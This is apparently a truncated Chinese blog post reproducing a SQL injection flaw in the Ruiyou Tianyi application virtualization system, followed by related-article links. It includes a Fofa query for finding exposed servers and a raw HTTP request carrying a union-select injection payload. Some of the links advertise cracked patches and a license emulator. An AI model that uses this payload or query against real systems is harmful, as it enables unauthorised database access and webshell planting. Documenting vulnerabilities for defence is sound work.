瑞友天翼应用虚拟化系统ConsoleExternalApi.XGI接口SQL注入

最新推荐文章于 2024-04-29 09:38:47 发布
最新推荐文章于 2024-04-29 09:38:47 发布
阅读量82 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136449439
版权

简介

瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台。

漏洞描述

瑞友天翼应用虚拟化系统存在多处SQL注入漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统写入Webshell执行任意代码。

影响范围

瑞友天翼应用虚拟化系统 <= 7.0.4.1
Fofa:

title="瑞友天翼-应用虚拟化系统" || title="瑞友应用虚拟化系统"

ConsoleExternalApi.XGI处漏洞复现

GET /ConsoleExternalApi.XGI?key=inner&initParams=command_getAppVisitLogByDataTable__user_admin__pwd_xxx__serverIdStr_1&sign=0a3d5f4f69628f32217ea9704d12bd6d&iDisplayStart=1+union+select+1,2,3,4,5,user()%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
Accep
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
订阅专栏
瑞友天翼应用虚拟化系统RCE漏洞复现+利用
0xSec
04-18 1万+
瑞友天翼应用虚拟化系统存在远程代码执行漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统上执行任意代码,(该漏洞是通过SQL注入写入后门文件进行代码执行)。
瑞友天翼应用虚拟化系统6.0license模拟器
07-31
瑞友天翼应用虚拟化系统6.0license模拟器
0day-瑞友应用虚拟化系统-AgentBoard-rce命令执行漏洞
weixin_43167326的博客
03-24 802
瑞友天翼应用虚拟化系统(GWT System)是一款国内具有自主知识产权的应用虚拟化平台,它基于服务器计算技术,致力于为用户提供集中、便捷、安全、高效的虚拟化支撑平台。该系统将用户所有的应用软件(如ERP、OA、CRM等)集中部署在天翼服务器上,客户端只需通过WEB即可快速安全地访问经服务器授权的应用软件,实现集中应用、远程接入和协同办公等功能。同时,瑞友天翼应用虚拟化系统还采用了独特的RAP协议,确保用户能够在任何时间、任何地点,利用任何设备快速访问服务器上的应用软件。
瑞友天翼应用虚拟化系统(GWT)V7.0服务器端和谐补丁
06-29
瑞友天翼应用虚拟化系统(GWT)V7.0服务器端和谐补丁
瑞友天翼应用虚拟化系统6.0
07-31
瑞友天翼应用虚拟化系统6.0
瑞友天翼应用虚拟化系统6.0软注册配置工具
07-31
瑞友天翼应用虚拟化系统6.0软注册配置工具
【漏洞复现】瑞友应用虚拟化系统 SQL注入
失心少年
08-29 567
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!瑞友天翼应用虚拟化系统(GWT System)是国内具有自主知识产权的应用虚拟化平台,是基于服务器计算(Server-based Computing)的应用虚拟化平台。
瑞友天翼应用虚拟化系统 多处SQL 注入漏洞复现(可RCE)
0xSec
12-15 1129
瑞友天翼应用虚拟化系统存在多处SQL注入漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统写入Webshell执行任意代码。
瑞友天翼应用虚拟化系统存在远程代码执行漏洞
nnn2188185的博客
04-19 883
西安瑞友信息技术资讯有限公司是专业从事虚拟化及云计算解决方案提供商。瑞友天翼应用虚拟化系统存在远程代码执行漏洞,攻击者可以利用此漏洞获WEB主机权限。
瑞友虚拟化征文---瑞友天翼应用虚拟化之实战演示
weixin_33754065的博客
10-30 177
瑞友虚拟化征文---瑞友天翼应用虚拟化之实战演示 前面已经介绍了服务器以及客户端的部署,今天我们来实验使用一下,看用户体验如何以及安全性怎么样! 打开客户端的虚拟化客户端,登陆账号,显示了已经被分配的程序,如图,可以看到,我们已经分配了一个QQ的程序出来, ...
瑞友天翼虚拟化客户端 6.0.2.0
05-24
瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。
瑞友天翼应用虚拟化系统(GWT)V6.0服务器端和谐补丁
06-29
瑞友天翼应用虚拟化系统(GWT)V6.0服务器端和谐补丁
Goby 漏洞更新 | 瑞友天翼应用虚拟化系统 index(1),字节Golang面试必问
2401_84240431的博客
04-17 414
瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day),攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过WEB即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
瑞友天翼2024SQL注入漏洞
weixin_44217321的博客
02-28 451
将用户所有应用软件集中部署在天翼服务器,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。操作终端无需再安装应用程序,通过RAP 协议(Remote Application Protocol),可让用户快速访问服务器上的各类应用软件;RAP 协议只传输鼠标、键盘及屏幕变化的矢量数据,用户不再受客户端和连接性能要求的限制,达到在任何时间、任何地点,利用任何设备、任何网络连接方式均可高效安全地访问服务器(群)上的应用程序和关键资源。文章置顶连接下载。
Goby 漏洞更新 | 瑞友天翼应用虚拟化系统 index.php 文件远程代码执行漏洞
m0_46699477的博客
04-11 1221
瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day),攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过WEB即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
[漏洞收集]格式化串漏洞深入
weixin_34306593的博客
04-22 110
printf中的缺陷: #include <stdio.h> main() { int a = 44,b = 77; printf("a=%d,b=%d\n",a,b); printf("a=%d,b=%d\n"); } 则会去读栈上存在的数据 1.用printf读取内存数据 #include <stdi...
网络安全之密码学技术
最新发布
缘友一世的博客
04-29 1331
在DES算法中,明文按64位进行分组(块),密钥长度也是64位,(事实上只有56位参与DES运算,第8、16、24、32、40、48、56、64位是校验位, 使DES的每个密钥都有奇数个1),分组后的每64位明文组(块)分别与56位密钥进行多轮置换(按位替代/交换),最后生成64位的密文组(块)。RSA密钥是(公钥+模值)、(私钥+模值)成组分发的,单独一个公钥或私钥是没有用处,所以所谓的“密钥”其实是它们两者中的一个。IDEA是作为迭代的分组密码实现的,使用128位的密钥和8个循环。
网络安全思考题
weixin_62304542的博客
04-27 1336
网络安全渗透思考题
瑞友天翼应用虚拟化系统(gwt)v6.0服务器端和谐补丁
06-15
瑞友天翼应用虚拟化系统(GWT)是一款企业级云计算解决方案,可实现应用程序的虚拟化、集中管理和访问,提高工作效率和资源利用率。但出于某些原因,GWT服务器可能会出现一些不兼容或漏洞的情况,导致系统故障或安全风险。为了解决这些问题,瑞友天翼发布了GWT v6.0服务器端和谐补丁。 这个补丁主要作用是修复GWT服务器端的安全漏洞和兼容性问题,并对系统进行优化,提升性能和稳定性。通过添加补丁,用户可保证系统的稳定性和安全性,避免数据泄露或系统崩溃对企业造成影响。 该补丁的安装需要严格按照瑞友天翼发布的安装指南进行操作,以保证补丁的有效性和稳定性。用户在安装前需备份系统数据和配置文件,以防补丁安装出现异常,影响系统运行。 总之,瑞友天翼应用虚拟化系统(GWT)服务器端和谐补丁的发布是为了解决系统安全和兼容性问题,并提高系统性能和稳定性,用户可根据需要自行选择安装。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值